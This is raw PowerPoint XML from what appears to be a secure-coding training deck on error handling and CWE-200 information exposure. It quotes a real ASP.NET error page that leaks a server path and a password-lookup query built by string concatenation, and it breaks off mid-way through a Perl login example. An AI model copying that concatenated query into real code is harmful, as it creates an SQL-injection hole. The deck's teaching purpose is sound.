              <a:tr h="413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Encryption</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611560" y="3697771"/>
            <a:ext cx="7772400" cy="1500187"/>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n-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Security Mechanism:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="960438" y="4077072"/>
            <a:ext cx="7772400" cy="1362075"/>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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0810B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Error Handling</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0810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4289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latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Error Handling Core Concepts</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35413" y="1447800"/>
            <a:ext cx="7814960" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Expect the unexpected – your data won’t always be what you assume</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>When you hit an error condition – log, cleanup, and STOP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Think carefully about what you send to the client and how you send it</a:t>
            </a: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11556"/>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Error Handling Words to Live By</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179512" y="1556792"/>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Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>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Don’t disclose information that should remain private</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>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Remember to cleanup completely in an error condition</a:t>
            </a:r>
            <a:endParaRPr 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6730" y="39270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Error Handling Words to Live By: #1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Horizontal Scroll 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="323864" y="1021947"/>
            <a:ext cx="62484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Don’t disclose information that should remain private</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1295400"/>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pPr marL="109537" indent="0">
              <a:buNone/>
            </a:pP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CWE-200: Information Exposure</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An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized to have access to that information. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3051763" y="5241290"/>
            <a:ext cx="2964273" cy="426207"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Think OPSEC!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>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738" y="381000"/>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Information Leakage Examples</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="437441" y="1314445"/>
            <a:ext cx="6619875" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx2">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="32" name="Group 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="513641" y="1924045"/>
            <a:ext cx="7772400" cy="1752599"/>
            <a:chOff x="762000" y="1752600"/>
            <a:chExt cx="7772400" cy="1752599"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="33" name="Picture 3"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="762000" y="1752600"/>
              <a:ext cx="6019800" cy="847725"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="34" name="Picture 4"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId9" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="762000" y="2763365"/>
              <a:ext cx="7772400" cy="741834"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="513641" y="3829045"/>
            <a:ext cx="5495925" cy="809625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx2">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="513641" y="4895845"/>
            <a:ext cx="3971925" cy="781050"/>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392703"/>
            <a:ext cx="828675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Real World Example – Information Leak</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="57149" y="914400"/>
            <a:ext cx="8753475" cy="5410200"/>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0"/>
              </a:spcAft>
              <a:buFont typeface="Georgia" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Server Error in '/' Application. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Georgia" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="1" dirty="0" smtClean="0"/>
              <a:t>Invalid object name '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>user_acc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="1" dirty="0" smtClean="0"/>
              <a:t>'.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Georgia" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Georgia" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>Description</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Georgia" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>Exception Details</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>System.Data.SqlClient.SqlException</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>: Invalid object name '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>user_acc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>'.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Georgia" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Georgia" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>Source Error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Line 135: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>sqlcmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>SqlCommand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>("select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>, password from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>user_acc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>='" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>uidd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> + "'", hookup);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Line 136: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>hookup.Open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>();</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Line 137: reader=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>sqlcmd.ExecuteReader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>();</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Line 138:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Line 139: while (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>reader.Read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>()) </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Source File: c:\inetpub\vhosts\cactusindia.com\httpdocs\Default.aspx.cs    Line: 137 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Georgia" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>Stack Trace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>SqlException</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> (0x80131904): Invalid object name '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>user_acc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>'.]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Georgia" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>Version Information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>: Microsoft .NET Framework Version:2.0.50727.4952; ASP.NET Version:2.0.50727.4955 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Georgia" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>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6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="150702" y="779754"/>
            <a:ext cx="8153400" cy="4535316"/>
            <a:chOff x="499158" y="592344"/>
            <a:chExt cx="8153400" cy="4055855"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rounded Rectangle 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="499158" y="592344"/>
              <a:ext cx="8153400" cy="4055855"/>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400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 1</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>     </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>my</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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>username = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>param</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>('username');</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 2     </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>my</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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>password = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>param</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>('password');</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <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 4     </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>if</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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>IsValidUsername</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>($username) == 1)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 5     {</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 6        </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>if</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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>IsValidPassword</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>($username, $password) == 1)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
